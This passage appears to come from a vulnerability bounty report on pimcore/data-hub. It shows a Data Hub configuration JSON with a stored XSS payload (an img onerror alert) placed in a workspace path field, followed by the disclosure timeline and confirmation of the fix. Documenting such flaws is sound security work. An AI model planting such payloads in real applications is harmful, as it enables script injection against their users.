Kingdom","value":"GB"},{"key":"United States","value":"US"},{"key":"Uruguay","value":"UY"},{"key":"Uzbekistan","value":"UZ"},{"key":"Vanuatu","value":"VU"},{"key":"Venezuela","value":"VE"},{"key":"Vietnam","value":"VN"},{"key":"Wallis and Futuna","value":"WF"},{"key":"Western Sahara","value":"EH"},{"key":"Yemen","value":"YE"},{"key":"Zambia","value":"ZM"},{"key":"Zimbabwe","value":"ZW"},{"key":"Åland Islands","value":"AX"}],"width":"","defaultValue":null,"optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":"190","phpdocType":"string","dynamicOptions":false,"name":"countryCode","title":"Country","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"phone","label":"phone","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"phone","title":"phone","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}}],"mutationEntities":[],"specialEntities":[{"name":"document","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-1"},{"name":"document_folder","readPossible":true,"createPossible":false,"updatePossible":false,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-2"},{"name":"asset","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-3"},{"name":"asset_folder","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-4"},{"name":"asset_listing","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-5"},{"name":"object_folder","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-6"}]},"security":{"method":"datahub_apikey","apikey":"295b86489dca91a4aafaac8315cdb84a","skipPermissionCheck":false},"workspaces":{"asset":[{"read":true,"cpath":"/Car Images","create":false,"update":false,"delete":false,"id":"extModel16109-2"},{"read":true,"cpath":"/Brand Logos","create":false,"update":false,"delete":false,"id":"extModel16109-1"}],"document":[{"read":true,"cpath":"<img/src/onerror=alert('xss')>","create":false,"update":false,"delete":false,"id":"extModel412-1"}],"object":[{"read":true,"cpath":"/Shop","create":false,"update":false,"delete":false,"id":"extModel16141-1"}]},"permissions":{"user":[],"role":[]}}
We are processing your report and will contact the pimcore/data-hub team within 24 hours. 4 months ago
We have contacted a member of the pimcore/data-hub team and are waiting to hear back 4 months ago
Divesh Pahuja validated this vulnerability 4 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
Divesh Pahuja confirmed that a fix has been merged on 6a85b7 4 months ago
Divesh Pahuja has been awarded the fix bounty
to join this conversation